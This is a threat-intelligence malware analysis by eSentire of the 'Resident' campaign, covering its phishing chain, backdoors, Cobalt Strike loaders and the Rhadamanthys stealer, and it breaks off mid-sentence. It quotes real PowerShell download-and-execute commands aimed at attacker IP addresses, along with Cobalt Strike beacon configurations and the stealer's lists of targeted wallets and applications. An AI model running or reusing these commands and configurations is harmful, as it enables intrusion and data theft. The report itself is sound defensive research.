{ "id": "9b65f33b-a59e-4a40-b888-eec80ce66e95", "created_at": "2026-04-06T00:16:30.178903Z", "updated_at": "2026-04-10T03:37:09.357144Z", "deleted_at": null, "sha1_hash": "88d7e23d50bdd2004b74e136c76a22034d7d5563", "title": "eSentire Threat Intelligence Malware Analysis: Resident Campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 18245008, "plain_text": "eSentire Threat Intelligence Malware Analysis: Resident Campaign\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:09:02 UTC\r\nSince November 2022, the eSentire Threat Response Unit (TRU) has observed the resurgence of what we believe to be a\r\nmalicious campaign targeting the manufacturing, commercial, and healthcare organizations. The campaign is similar to the\r\none reported by Trend Micro researchers in December 2020. The campaign is believed to be conducted by native Russian\r\nspeaking threat actor(s).\r\nThis malware analysis references four separate incidents where our machine-learning PowerShell classifier, Bluesteel\r\ndetected malicious PowerShell commands executing a script from an attacker hosted domain. It delves deeper into the\r\ntechnical details of how the Resident campaign operates and our security recommendations to protect your organization\r\nfrom being exploited.\r\nKey Takeaways\r\nThe Resident campaign is named after the custom backdoor that the threat actor(s) retrieved from one of the\r\nestablished sessions with the command and control (C2) server.\r\nThe backdoor has the capabilities to achieve persistence and deploy secondary payloads.\r\nThe Resident campaign is delivered via drive-by downloads leveraging compromised websites and phishing emails\r\ncontaining the fake OneDrive attachment that leads to the page hosting the JavaScript payload.\r\nResident threat actor(s) retrieve multiple MSI installers that contain the tools used for post-compromise objectives.\r\neSentire's Threat Intelligence team has observed the campaign delivering Rhadamanthys stealer.\r\nThese insights are based on four separate incidents targeting manufacturing, commercial, and healthcare\r\norganizations.\r\nInitial Infection Vector\r\nThe initial infection vector we have observed is a phishing email. It should be noted that the SANS Internet Storm Center\r\nhas also observed the campaign spreading via drive-by downloads. The threat actor(s) are using email hijacking to deliver\r\nthe malicious payload with a PDF attachment. The attacker(s) adds the sender domain to Vesta Control Panel to make it look\r\nlegitimate when the user browses to the domain (Figure 1).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 1 of 34\n\nFigure 1: Phishing email\r\nThe PDF attachment contains the link to the domain that sends the user to saprefx[.]com domain and based on the geo\r\nlocation of the user, the domain will either redirect the user to the final domain that hosts the JavaScript payload or displays\r\nthe TeamViewer installer page as shown below (Figure 2).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 2 of 34\n\nFigure 2: The redirect chain\r\nThe JavaScript payload is usually hosted on compromised WordPress websites. An example of the initial JavaScript payload\r\nis shown in Figure 3.\r\nFigure 3: JavaScript snippet\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 3 of 34\n\nAfter the user opens the JavaScript attachment, the script would directly download and execute the MSI file using\r\nInstallProduct method. In our example, the first retrieved MSI installer dropped Terminal_App_Service VBS (Visual Basic\r\nScript) file under ProgramData/Cis folder (we also observed the name Imdb.vbs being used (MD5:\r\nc3f9b1fa3bcde637ec3d88ef6a350977)).\r\nThe VBS file reaches out to the C2 with the serial number of the C drive on the infected machine as a parameter then it\r\nretrieves the Windows Installer product and runs it without the user’s knowledge in the background. The script enters the\r\nloop where it would continue retrieving and installing the MSI files every 9368 milliseconds (Figure 4).\r\nFigure 4: Malicious VBS script dropped from the first MSI file\r\nThe retrieved MSI files (we observed approximately 3 MSI files being retrieved originating from the VBS script), contain\r\nthe tools or scripts to take a screenshot of the host at the time of infection; this is completed with an AutoHotKey script. We\r\nhave also observed AutoIt, Python scripts, and i_view32.exe tool used to take the screenshot of the host.\r\nCase Study #1\r\nDuring the first campaign, our TRU team observed the threat actor dropping the backdoor, Cobalt Strike payload, and the\r\nPython script responsible for taking a screenshot of the host. Here are some of the files that were observed dropped on the\r\nendpoint during the first incident:\r\nsdv.vbs (C:\\ProgramData\\sdv) – MD5: 0e5598b0a72bf83378056ae52be6eda4, the script uses WScript.shell object to\r\nquery the Windows Management Instrumentation (WMI) for information about active processes, caption, command\r\nline, creation date, computer name, executable path, OS (Operating Systems) name, and Windows version. It then\r\nsends the gathered information along with drive (C:\\) serial number to the C2 (Figure 5).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 4 of 34\n\nFigure 5: sdv.vbs script\r\nscreen1.pyw (C:\\ProgramData\\sdv) – MD5: a628240139c04ec84c0e110ede5bb40b, Python script that is responsible\r\nfor taking a screenshot and sending to the C2 with a serial drive number (Figure 6).\r\nFigure 6: snippet of screen1.pyw\r\nhcmd.exe (AppData\\Roaming\\hcmd) – node.exe, MD5: f5182a0fa1f87c2c7538b9d8948ad3ce\r\nImdb.vbs (MD5: c3f9b1fa3bcde637ec3d88ef6a350977).\r\nindex.js (MD5: 5bdb1ac2a38ab3e43601eee055b1983f), under AppData\\Roaming\\hcmd folder – one of the main\r\nscripts deployed by the Resident campaign. The script serves as a backdoor and runs with a specific argument via the\r\nrenamed node.exe binary (hcmd.exe) – hcmd.exe index.js 2450639401. The script is using Socket.IO for bi-https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 5 of 34\n\ndirectional communication and is setting up a command line interface that allows the infected host to connect to a C2\r\nserver via port 3000 using the given 'hwid' (Hardware ID) and 'password'.\r\nOnce the connection is established with the C2, the code sets up event listeners for connect, disconnect, cmd-ping,\r\nand cmd-command events. The code logs a message to the console and when the disconnect and disconnect events\r\nare triggered, When the cmd-ping event is triggered, the code sends a cmd-pong message with the hwid. Finally,\r\nwhen the cmd-command event is triggered, the code executes the given command from the C2 in the terminal and\r\nlogs the output (Figure 7).\r\nFigure 7: Snippet of index.js backdoor\r\nnode_modules directory that contains the dependencies for node.exe (AppData\\Roaming\\hcmd).\r\n7765676.exe (similar to the Cobalt Strike PowerShell DLL payload that we will mention later in this report) – the\r\nCobalt Strike executable that was dropped via the active session with the C2 server via the backdoor access.\r\nWe have observed persistence techniques being created via Startup. Two shortcut files were created under the Startup folder.\r\nCUGraphic.lnk (Startup persistence) – the shortcut is responsible for launching the AutoHotKey script under\r\nProgramData\\2020 (Figure 8).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 6 of 34\n\nFigure 8: CUGraphic.lnk content\r\nImdb.lnk (Startup persistence) – the shortcut file is pointing to the directory C:\\ProgramData\\Cis\\. Upon running\r\nthe malicious MSI installer, it installs the malicious “application” which is the Imdb.vbs script. The Application ID in\r\nthe registry (e.g., HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-\r\n1866265027-1870850910-1579135973-1000\\Products\\985AA98E08645254995AFEA67F8AC3B6\\Features\\) allows\r\nthe VBS file to run upon startup with the shortcut pointing to the directory.\r\nApplication ID is a unique identifier assigned to a shortcut file when it is created. The Application ID is used to track\r\nthe shortcut file and its associated application, so that Windows can properly manage the shortcut and its associated\r\napplication (Figure 9).\r\nFigure 9: Shortcut file, installed application and the Application ID in the registry\r\nSo, what about the PowerShell?\r\nThe malicious PowerShell command mentioned before retrieves and executes the PowerShell script from 31.41.244[.]142.\r\nThe PowerShell script loads kernel32.dll and crypt32.dll via LoadLibraryA and uses the function CryptStringToBinaryA\r\nfrom crypt32.dll to convert the base64 string to a binary format (Figure 10).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 7 of 34\n\nFigure 10: Malicious PowerShell script containing the Cobalt Strike payload hosted on attacker's domain\r\nIt then creates a file mapping of the binary data with the CreateFileMappingA function from kernel32.dll and maps the\r\nmalicious payload into memory with MapViewOfFile function from the kernel32.dll. Finally, it invokes the mapped binary\r\npayload with the Invoke method.\r\nThe malicious payload which is the Cobalt Strike loader (MD5: f8d780f77553e7780ebcf917844571b0) enumerates the\r\n“powershell.exe” process using CreateToolhelp32Snapshot. It then attempts to request read and write access rights to the\r\nprocess. If it fails to get the access, the payload terminates (Figure 11).\r\nFigure 11: The payload enumerates for PowerShell process\r\nThe loader uses API hashing, shown in Figure 12.\r\nFigure 12: Hashed APIs\r\nSpecifically using CRC32 with JAMCRC algorithm to hash the APIs with the 32-bit polynomial 0xEDB88320 that is used\r\nin CRC32 checksum table (Figure 13).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 8 of 34\n\nFigure 13: CRC32 checksum table\r\nThe malicious payload initially loads APIs from kernel32.dll, then the rest of the APIs from libraries such as advapi32.dll,\r\nwininet.dll and ws2_32.dll. We can create a quick IDAPython script to rename the DWORDs that store the API value\r\n(Figure 14).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 9 of 34\n\nFigure 14: IDAPython script to calculate the CRC32 JAMCRC hash and rename the DWORDs\r\nThe loader sample allocates the memory and decodes to MZRE header which is known for Cobalt Strike payloads that use\r\nmagic_mz_x86 option to override the MZ header. The decoding routing uses a bitwise rotation as shown in Figure 15.\r\nFigure 15: The loader allocates the memory and partially decrypts the Cobalt Strike payload\r\nThe decoding function can be implemented as follows:\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 10 of 34\n\nn = 1\r\nfor byte in byte_array:\r\n b = byte \u0026 255\r\n ror = ((b \u003e\u003e (n \u0026 7)) | (b \u003c\u003c (8 - (n \u0026 7)))) \u0026 255\r\n n += 1\r\n print(ror)\r\nThe Cobalt Strike configuration is shown below:\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1048576,\r\n \"Jitter\": 0,\r\n \"C2Server\": \"31.41.244[.]142,/g.pixel\",\r\n \"HttpPostUri\": \"/submit.php\",\r\n \"Malleable_C2_Instructions\": [],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1580103824,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 0,\r\n \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"\r\n}\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 11 of 34\n\nFigure 16: Cobalt Strike payload loaded into memory\r\nCase Study #2\r\nIn this incident, the threat actor(s) deployed their custom written backdoor tool named resident2.exe. The backdoor\r\nresident2.exe was dropped from the Cobalt Strike session and designates the end of the infection chain (Figure 17). The\r\ntools such as windows-kill.exe that terminates Windows processes and netping.exe (presumably the network ping tool) were\r\nalso brought onboard by the threat actor.\r\nFigure 17: Infection chain (1)\r\nThe files we have observed being dropped from this case:\r\ns.au3 – (MD5: b8822d99850ac70cb3de0e1d39639add) – AutoIt script (dropped under C:\\ProgramData\\jaf\\s.au3).\r\nThe script is written in AutoIt scripting language; it takes the screenshot of the infected machine using functions such\r\nas _ScreenCapture_SetJPGQuality() and _ScreenCapture_Capture(), it then reads the content of the screenshot file\r\n(s.jpg), sets the request headers and sends it to the C2 server with the serial number of the C:\\ drive recorded from\r\ns.vbs script (Figure 18).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 12 of 34\n\nFigure 18: s.au3 script (screenshot capture)\r\nindex.js (AppData\\Roaming\\hcmd\\)\r\nau3.exe (ProgramData\\2020\\) – AutoHotKey tool.\r\ns.exe (ProgramData\\jaf\\) – AutoIT tool.\r\nImdb.vbs (C:\\ProgramData\\Cis).\r\nhcmd.exe (AppData\\Roaming\\hcmd\\hcmd.exe).\r\ns.vbs (ProgramData\\jaf\\) – gets the serial number of the C:\\ drive and outputs it to a text file s.txt (Figure 19).\r\nFigure 19: s.vbs script\r\nwindows-kill.exe (AppData\\Roaming\\hcmd\\node_modules\\nodemon\\bin\\) – Windows process “killer”.\r\nnetping.exe (downloaded via PowerShell: powershell Invoke-WebRequest hxxps://temp[.]sh/BOTnt/netping.exe -\r\nOutFile C:\\programdata\\netping.exe) – we could not retrieve the file from the system, but we assume it is the\r\nnetwork ping tool that pings a range of IP addresses.\r\nresident2.exe – the custom written backdoor.\r\nAs you might have noticed, the index.js backdoor is also present in this case. The backdoor session was established via the\r\ncommand hcmd.exe index.js 2094656165.\r\nDuring the established backdoor session two Cobalt Strike payloads were downloaded from 62.204.41[.]171 via the\r\nfollowing commands:\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/a'))\"\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/b'))\"\r\nThe threat actor(s) also performed reconnaissance with the following commands:\r\nnet group “domains admins” /domain\r\nwhoami /groups\r\nipconfig /all\r\nWhat is resident2.exe?\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 13 of 34\n\nThe binary is 32-bit executable written in C programming language. Upon successful execution the binary creates a copy of\r\nitself under C:\\ProgramData\\RtlUpd as RtlUpd.exe. The persistence is achieved via a scheduled task named “RtlUpd” that\r\nruns every 10 minutes starting from the time when the binary was first executed (Figure 20).\r\nFigure 20: Task Scheduler function\r\nThe strings in the binary are encrypted with RC4 (Figure 21).\r\nFigure 21: RC4 KSA algorithm\r\nThe encrypted strings are stored in .rdata section and would skip the first 4 bytes and take the next 4-5 bytes of the\r\nhexadecimal string as an RC4 key, the rest of the string would be the encrypted data (Figure 22).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 14 of 34\n\nFigure 22: The structure of the encrypted data and key\n\nThe binary contains the custom base64-encoded and RC4 encrypted string of in the /GET requests as shown in Figure\n23.\n\nFigure 23: GET request within the pcap data\nThis function in Figure 24 is retrieving the volume serial number, computer name, and username of the current system. It\nthen base64-encodes the retrieved values.\nFigure 24: Retrieving the data and base64-encode them\nThe CRC32 function in Figure 25 is supposed to calculate the checksum for the computer name and username separately\nalthough it produces different checksum values for unknown reasons.\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\nPage 15 of 34\n\nFigure 25: Implementation of CRC32 in the binary\r\nMoving forward, the binary build the string based on the pattern %d|%08X%08X|%d|%d|%d|%d|%hs|%hs which can be\r\ntranslated into |\u003cVolumeSerialNumber||||calc_val||.\r\nThe can be 0 or the hexadecimal representation of the image base address of the binary. The calc_val contains the calculated\r\nvalue based on the wProcessorArchitecture value plus the value returned from GetSystemMetrics.\r\nThe API retrieves the build number if the system is Windows Server 2003 R2, otherwise it would return 0 and if the value is\r\n0 – a1 will hold the value 4 otherwise it will be 6 (Figure 26).\r\nFigure 26: String builder and calc_val functions\r\nNext, the binary would use generated string pattern and “24de21a8-a70b-4364-82b1-dc08434c93d7” as an RC4 key to\r\nproduce a value that they will use within the base64-encoding algorithm along with the generated string pattern we\r\nmentioned before. The final result is a custom base64-encoded string (Figure 27).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 16 of 34\n\nFigure 27: Custom base64-encoding algorithm\r\nFurther analyzing the binary, we noticed that the binary checks if the argument to run the binary contains “/p” and if it does,\r\nthe binary returns 1 and reaches out C2. If the binary contains 0 arguments, it proceeds with dropping RtlUpd.exe under\r\n%ALLUSERSPROFILE%\\RtlUpd.\r\nWe have noticed that the binary has the capability of dropping RtlUpd.dll as well under %ALLUSERSPROFILE%\\RtlUpd\r\nand %APPDATA%\\RtlUpd, it then schedules the tasks to run the files whether it is RtlUpd.exe or RtlUpd.dll. The reason it\r\nperforms the checks is to confirm if the copy of the payload already exists on the system (the scheduled task is set to run the\r\nbinary copy with a “/p” argument) and if the copy exists it simply initiates the C2 connection.\r\nThe binary resolves the APIs dynamically as it’s shown in Figure 28.\r\nFigure 28: Resolving APIs dynamically\r\nOne of the main functionalities of resident2 binary is the ability to execute the payloads that can be placed by the threat\r\nactor(s) during the hands-on intrusion activity or directly retrieved from C2. The binary abuses LOLBAS (Living Off the\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 17 of 34\n\nLand Binaries and Scripts) – shell32 and certutil.exe to run the malicious payloads. The binary checks if the payload has\r\n“.exe” or “.dll” extensions.\r\nIf the payload is an executable, the command “rundll32.exe shell32.dll,ShellExec_RunDLL %s” would be executed; if the\r\npayload is a DLL – the command “rundll32.exe %s, Start“ is set to run, where %s is the payload filename (Figure 29).\r\nFigure 29: Extension check and execute the commands accordingly\r\neSentire TRU is almost certain one of the function’s functionalities is to run the Cobalt Strike payload deployed by threat\r\nactor(s). One of the Cobalt Strike payloads we have analyzed contained the “Start” value as the ordinal.\r\nAs for certutil.exe, the “-decode” parameter can be used to decode Base64-encoded data. In our case, the attacker(s) can\r\ndecode the Base64-encoded payload that is hidden within the certificate file (Figure 30).\r\nFigure 30: Example of how attacker(s) can abuse certutil.exe\r\nThe scheduled task would be created to run the payloads using the techniques described above where the class identifier\r\nCLSID is calculated based on the name of the payload, its unique identifier and volume serial number (Figure 31).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 18 of 34\n\nFigure 31: GUID build\r\nCase Study #3\r\nIn this incident, the threat actors initiate their intrusion by abusing wscript.exe to launch the malicious JavaScript file.\r\nAdditionally, the graphic editor tool i_view32.exe was also dropped to take a screenshot of the infected host. The threat\r\nactor also attempted to deploy the Rhadamanthys stealer (Figure 32).\r\nFigure 32: Infection chain (2)\r\nFiles dropped:\r\napp.js – (C:\\ProgramData\\Dored) – MD5: 89e320093ce9d3a9e61e58c1121b76e7, the script runs an executable file\r\ncalled i_view32.exe (IrfanView – graphic viewer, editor tool) with two arguments \"/capture\" and\r\n\"/convert=skev.jpg\". This command will capture an image and convert it to the file format \"skev.jpg\" (Figure 33).\r\nFigure 33: app.js script\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 19 of 34\n\nindex.js (C:\\ProgramData\\Dored) – MD5: 44839c07923d8a37f49782e6a2567950, the script sends the screenshot\r\ntaken with IrfanView tool along with the serial drive number to the C2 (Figure 34).\r\nFigure 34: index.js script\r\nsdv.vbs – (ProgramData\\sdv\\) – gets the serial number of the C:\\ drive and outputs it to a text file t.txt.\r\ni_view32.exe – graphic editor tool\r\nskev.jpg – screenshot image (C:\\ProgramData\\Dored)\r\nCUGraphic.lnk\r\nau3.ahk (ProgramData\\2020\\)\r\nau3.exe\r\nThe Rhadamanthys Stealer Case\r\nDuring the case study #3 (Figure 35), at the end of the infection chain during the established C2 session, the threat actor(s)\r\nattempted to run Rhadamanthys Stealer on the host.\r\nFigure 35: Stealer execution\r\nThe stealer or, to be specific, the loader part of the stealer can be easily identified by the rundll32.exe process spawning\r\nfrom the initial payload with the command pattern: rundll32.exe nsis_uns{hexadecimal_numbers}, PrintUIEntry\r\n|5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|\r\n{redacted}\r\nThe nsis_uns DLL is dropped under the path C:\\Users\\\\AppData\\Roaming\\ and is used to map the retrieved shellcode into\r\nthe memory space and execute it.\r\nRhadamanthys Stealer first appeared in September 2022 on the Russian speaking forum (Figure 36).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 20 of 34\n\nFigure 36: Rhamadanthys Stealer for sale\r\nCurrently the stealer developer is working on integrating the keylogger plugin into the stealer (Figure 37).\r\nFigure 37: Stealer developer's post on the hacking forum\r\nThe stealer exfiltrates system information, screenshot, Browser credentials and cookies, crypto wallets, FTP, Mail clients,\r\nTwo Factor Authentication applications (RoboForm, WinAuth, Authy Desktop), password manager (KeePass), VPN,\r\nMessenger data (Psi+, Pidgin, TOX, Discord, Telegram), Steam, TeamViewer SecureCRT, additionally it also exfiltrates\r\nNoteFly, Notezilla, Simple Sticky Notes, Windows 7 and 10 Sticky Notes. The stealer admin panel is operated within\r\nCentOS 7 (Ubuntu 16) panels.\r\nSome of the crypto wallet extensions that the stealer exfiltrates:\r\nAuvitas Wallet BitApp Crocobit\r\nExodus Finnie GuildWallet\r\nICONex Jaxx Keplr\r\nLiquality MTV Wallet Math\r\nMetamask Mobox Nifty\r\nOxygen Phantom Rabet Wallet\r\nRonin Wallet Slope Wallet Sollet\r\nStarcoin Swash Terra Station\r\nTron XinPay Yoroi Wallet\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 21 of 34\n\nZilPay Wallet binance coin98\r\nThe stealer can perform brute-force against crypto wallets using the list of custom passwords.\r\nBrowsers:\r\n360ChromeX 360 Secure Browser 7Star\r\nAVAST Browser AVG Browser Atom\r\nAvant Browser BlackHawk Blisk\r\nBrave CCleaner Browser CentBrowser\r\nChedot CocCoc Coowon\r\nCyberfox Dragon Element Browser\r\nEpic Privacy Browser Falkon Firefox\r\nFirefox Nightly GhostBrowser Google Chrome\r\nHummingbird IceDragon Iridium\r\nK-Meleont Kinza Kometa Browser\r\nSLBrowser MapleStudio Maxthon\r\nNaver Whale Opera Opera GX\r\nOpera Neon QQBrowser SRWare Iron\r\nSeaMonkey Sleipnir5 Slimjet\r\nSuperbird Twinkstar UCBrowser\r\nXvast citrio Pale Moon\r\nTorch Web Browser UR Browser Vivaldi\r\nCrypto Wallets:\r\nArmory AtomicWallet Atomicdex\r\nBinance Wallet Bisq BitcoinCore\r\nBitcoinGold Bytecoink Coinomi wallets\r\nDashCore DeFi-Wallet Defichain-electrum\r\nDogecoin Electron Cash Electrum\r\nElectrum-LTC Ethereum Wallet Exodus\r\nFrame Guarda Jaxx\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 22 of 34\n\nLitecoinCore Monero MyCrypto\r\nMyMonero Safepay Solar wallet\r\nTokenpocket WalletWasabi Zap\r\nZcash Zecwallet Lite\r\nFTP clients:\r\nCyberduck FTP Navigator\r\nFTPRush FlashFXP\r\nSmartftp TotalCommander\r\nWinscp Ws_ftp\r\nCoreftp\r\nMail Clients:\r\nCCheckMail Claws-mail\r\nGmailNotifierPro Mailbird\r\nOutlook PostboxApp\r\nTheBat! Thunderbird\r\nTrulyMail eM Client\r\nFoxmail\r\nVPN:\r\nAzireVPN NordVPN\r\nOpenVPN PrivateVPN_Global_AB\r\nProtonVPN WindscribeVPN\r\nThe stealer can retrieve the files on the host via the File Grabber module (Figure 38).\r\nFigure 38: File Grabber module\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 23 of 34\n\nThe Extension module contains the functionality to run the PowerShell scripts and download the binaries directly from the\r\nInternet via PowerShell (Figure 39).\r\nFigure 39: Extension module\r\nThe Task section allows the stealer to perform certain actions upon execution (Figure 40).\r\nFigure 40: Task configuration\r\nThe Server section (Figure 41) contains the main configurations for the stealer such as the option to enable area restrictions.\r\nIf the option is on, the stealer will not work in countries such as Russia and Ukraine, although the stealer developer\r\nmentioned that the stealer will not work in Commonwealth of Independent States (CIS) countries).\r\nIn addition, it also configures ports for server-side binding address (the main communication with the C2 including\r\nshellcode retrieval after the successful execution) and admin panel binding address (the attacker can change the ports from\r\nthe default :443 to any other ports for the admin panel access).\r\nThe attacker can also change the gateway address which is the directory where the stealer retrieves the shellcode, “/blob”\r\nserves as a default directory.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 24 of 34\n\nFigure 41: Snippet of the Server section\r\nThe Build section (Figure 42) specifies how the binary is built including the options to enable anti-debugging, anti VM,\r\nlaunching the executable with administrative privileges and the file pump feature to increase the file size by filling it up with\r\n0s to bypass Antivirus and some sandbox checks. The exfiltrated data is transmitted via WebSocket over the AES256\r\nencrypted channel.\r\nFigure 42: Build section\r\nIf the Task section is configured, the process .tmp.exe will be spawned as shown in Figure 43.\r\nFigure 43: Process tree with Task and Extension modules enabled\r\nThe dllhost.exe is spawned if the Extension module is configured to retrieve additional payloads or run PowerShell\r\nscripts/commands.\r\nCase Study #4\r\nIn this incident, the threat actors first leveraged au3.exe that then spawned a serious of other malicious executables.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 25 of 34\n\nFigure 44: Infection chain (3)\r\nFiles dropped by the threat actor(s):\r\nTerminal App Service.vbs (C:\\ProgramData\\Cis)\r\napp.js (C:\\ProgramData\\Dored) – similar to the previous case\r\nau3.exe (C:\\ProgramData\\2020)\r\nau3.ahk (C:\\ProgramData\\2020)\r\nindex.js (C:\\ProgramData\\Dored) – screenshot sender script, similar to the 3rd incident\r\ni_view32.exe (C:\\ProgramData\\Dored)\r\nskev.jpg – screenshot image (C:\\ProgramData\\Dored)\r\nhcmd.exe (AppData\\Roaming\\hcmd\\hcmd.exe)\r\nindex.js (AppData\\Roaming\\hcmd)\r\nhcmd.exe (AppData\\Roaming\\hcmd)\r\nAfter obtaining the backdoor session to the infected machine via the command hcmd.exe index.js 2450639401, the actor(s)\r\nran the systeminfo command to collect detailed system information and attempted to ping the Domain Controller. The threat\r\nactor(s) also attempted to pull the Cobalt Strike payload from the server which happens to be also the one hosting Cobalt\r\nStrike.\r\nThe command line used to retrieve the Cobalt Strike payload from the established backdoor session:\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('hxxp[:]//62.204.41[.]155:80/sjj63NS'\r\nThe following is the beacon configuration:\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1048576,\r\n \"Jitter\": 0,\r\n \"C2Server\": \"62.204.41[.]155,/pixel\",\r\n \"HttpPostUri\": \"/submit.php\",\r\n \"Malleable_C2_Instructions\": [],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 26 of 34\n\n\"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1580103824,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 0,\r\n \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"\r\n}\r\nConclusion\r\nOur TRU team identified a malicious campaign known as Resident, which is believed to be carried out by Russian native-speaking threat actors. The threat actors behind Resident are attempting to infiltrate networks and exfiltrate data from\r\ninfected machines by using backdoors, Cobalt Strike, and stealers. In particular, they have been observed using the\r\nRhamadanthys stealer, which is known for its stealthy capabilities, instead of other more well-known stealers such as\r\nRedline and Vidar.\r\nThe threat actors are using these techniques to gain a foothold and propagate across a network laterally, making it difficult\r\nfor victims to detect or respond quickly. The campaign could cause significant disruption and financial losses for those\r\nimpacted. As such, eSentire’s Threat Intelligence team in collaboration with TRU have engineered various detection\r\ncapabilities to detect and prevent Resident infections.\r\nHow eSentire is Responding\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create\r\npractical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity\r\nthreats by deploying countermeasures, such as:\r\nImplementing threat detections and BlueSteel, our machine-learning powered PowerShell classifier, to identify\r\nmalicious command execution and exploitation attempts and ensure that eSentire has visibility and detections are in\r\nplace across eSentire MDR for Endpoint.\r\nPerforming global threat hunts for indicators associated with Resident campaign and Rhadamanthys Stealer.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 27 of 34\n\nOur detection content is supported by investigation runbooks, ensuring our SOC (Security Operations Center) analysts\r\nrespond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures. In addition, TRU\r\nclosely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat 